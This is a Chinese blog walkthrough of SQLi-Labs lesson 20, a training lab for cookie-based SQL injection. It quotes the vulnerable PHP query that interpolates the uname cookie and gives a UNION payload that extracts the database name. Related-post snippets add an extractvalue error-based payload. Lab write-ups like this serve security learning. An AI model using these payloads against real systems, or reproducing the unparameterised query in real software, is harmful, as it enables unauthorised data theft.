SQLi Labs Lesson20

最新推荐文章于 2024-05-18 15:04:49 发布
最新推荐文章于 2024-05-18 15:04:49 发布
阅读量315 收藏
点赞数
分类专栏: SQLi
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/x728999452/article/details/52224377
版权

Lesson - 20

POST - Cookie Injection - Uagent field - error based


该网页大概框架如下:

if(!isset($_COOKIE['uname']))
{
    //声明实现过滤函数check_input
    function check_input($value)
    {
    ......
    }
    
    //对username,password进行验证登陆
    //如果username,password匹配,setcookie
    //重新载入当前页面
}
else
{
    if(!isset($_POST['submit']))
    {
    //输出各种信息。
    }
    else
    {
    //删除cookie,重新载入当前界面
    }
}
以username:admin , password:admin登陆:


通过查看php源码,发现cookie可以注入:

$cookee = $_COOKIE['uname'];
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";


更改cookie,使uname =  ' union select 1 , 2 , database()#


同理可以得到其他信息,进一步注入。

回忆里的褶皱
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlilabs过关手册注入天书,过关sqlliabs的绝佳手册
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当中...
mysql注入-sqlilabs靶场注入
10-15
本教程基于SQLiLabs靶场,将深入探讨MySQL注入的各种技术和防御策略。 SQLiLabs是专门为学习和实践SQL注入技能设计的一个在线平台,它包含了多个级别,每个级别代表一个特定的注入场景,逐步提高难度。通过完成这些...
Sqlilabs-20
KAKA的博客
07-09 592
十大关一关卡,小试牛刀来到了第 20 关: 本关还是在 HTTP HEADRE 做文章,具体为 COOKIE 先输入正确的用户名和密码,进入界面看看: 通过观察我们可以看到具体的 payload 该如何构造 把 hackbar 的 cookie 栏调出来: –查表 uname=admin' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=databas
sqli-labs(20)
jimggg的博客
03-20 254
Less-20 POST - Cookie injections - Uagent field - Error based (基于错误的cookie头部POST注入)
详细sqli-labs(1-20)通关讲解
最新发布
m0_57928318的博客
05-18 1640
获取数据库名时可以使用 left() 函数,这里使用 substr() 函数截取数据库名的每个字符,然后使用 ASCII() 函数判断这个字符的 ASCII 码值。我们可以看出,GET 方式和post 方式 的区别,GET方式 可以明显的 从 URL 中进行注入,POST可以在数据包中进行修改对应的字段来进行 SQL 注入。获取数据库名时,使用 LEFT() 函数进行穷举法的效率较低,使用 substr() 函数结合 ASCII() 函数进行判断可以使用二分法快速缩小范围。
sqli-labs(20)
weixin_30419799的博客
05-27 99
0X01 试探一下 这是登录成功的页面 这里题目高速我们是基于cookie的注入 0X01抓包试探 这里登陆的时候有两个包 我们要含有cookie的那个包 0X02试探判断是否cookie存在注入 Cookie: uname=admin' 报错 那么应该是基于'的cookie注入 我们现在找到了 是cookie的注入 并且是’闭合 那么我们如何进行注...
Sqli-labs学习SQL注入-Lesson 11-20总结
weixin_38116282的博客
09-25 379
LE11- 简单的POST注入 闭合 ' LE12-简单的POST注入 闭合 ") LE13-简单的POST注入 闭合 ')  测试的时候多用'  " 然后判断语句怎么写的 LE14- 简单的POST注入 闭合 " LE15- 没有报错提示 只能用盲注 就是利用真假                 例如
sqli-labs通关记 lesson11~20
qq_35258210的博客
12-30 221
"""本人网安小白,此贴仅作为记录我个人测试的思路、总结以便后期复习;今后本着少就是多,慢就是快的方式一步一个脚印进行学习,把这个知识点学扎实了,再学另外一个知识点。费曼教授是不是曾经说过以教代学是最好的学习方式?有很多错点可圈可指,所以也请dalao指出不对的地方,所谓教他人的时候也是在稳固自身""" 未做严格排版,后面有时间了再来整理整理 边实践边写记录总结可以帮助大脑滤清思路,挺好的一种学习方式 # 边实践变记录后面还有55关卡,每通10关卡记录一贴 目录 lesson11 lesson1
sqlilabs过关手册注入天书
08-17
sqlilabs过关手册注入天书
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
安装sqli-labs
10-22
安装sqli-labs靶场环境 本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地...
SQLi-Labs Lesson 11-20
weixin_34384557的博客
07-30 131
Lesson 11: POST - Error based - Single quotes - String // POST-基于错误-单引号-字符型 点击进入之后发现与之前的界面不同了: 我们尝试用admin:admin登录,没想到直接进去了,哈哈哈哈 但这不是我们的最终目标,因为这只是恰好猜对了密码,我们尝试在用户名的后面加个单引号'...
sqli-labs第二十关
m0_73248913的博客
02-16 456
sqlilabs第二十关cookie注入
SQLilabs的第20关(HTTP请求头-Cookie)——报错注入
qq_73393033的博客
07-23 667
我们在判断闭合方式时发现,该网站会返回报错信息,又没有回显,因此适合使用报错注入。我们在cookie的后面加上一个',返回;这说明闭合方式是'。
(手工)【sqli-labs20】cookie注入:原理、利用过程
07-10 941
SQL-cookie注入】
sqli-lubs全20关(图文)
rui__rui__的博客
01-18 4801
SQLI-LABS注入前20关(学自B站crow大佬)
sqli-labs关卡20(基于http头部报错盲注)通关思路
zyh1588的博客
11-18 996
小白回顾sql靶场第二十关
sqli-labs靶场第二十关
gou1791241251的博客
12-30 1163
根据提示,二十关是cookie注入。我们输入单引号和双引号进行测试 发现它报错了,说明应该是单引号闭合的 尝试一下构建报错注入。 此处的报错信息中查询到了数据库版本,同理可以查询所有库,所有表名,所有字段名等信息。 ...
sqli-labs解题大法18~20
weixin_43733035的博客
01-22 904
Less-18: 这一关看过源码后发现username和password都进行了check_input,然后瞬间迷茫了,两个输入的地方都没办法进行注入了啊。后来看了下源码,发现了一个insert 这里可以用burp_suite来进行抓包修改,软件安装参考 [burp的安装]:(https://blog.csdn.net/weixin_43733035/article/details/8659354...
sqlilabs20
07-28
抱歉,我无法回答关于sqlilabs20的问题。我的目标是提供有关麦田怪圈的信息。如果您有关于麦田怪圈的问题,请随时提问。 #### 引用[.reference_title] - *1* *2* *3* [sqli-lubs全20关(图文)]...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值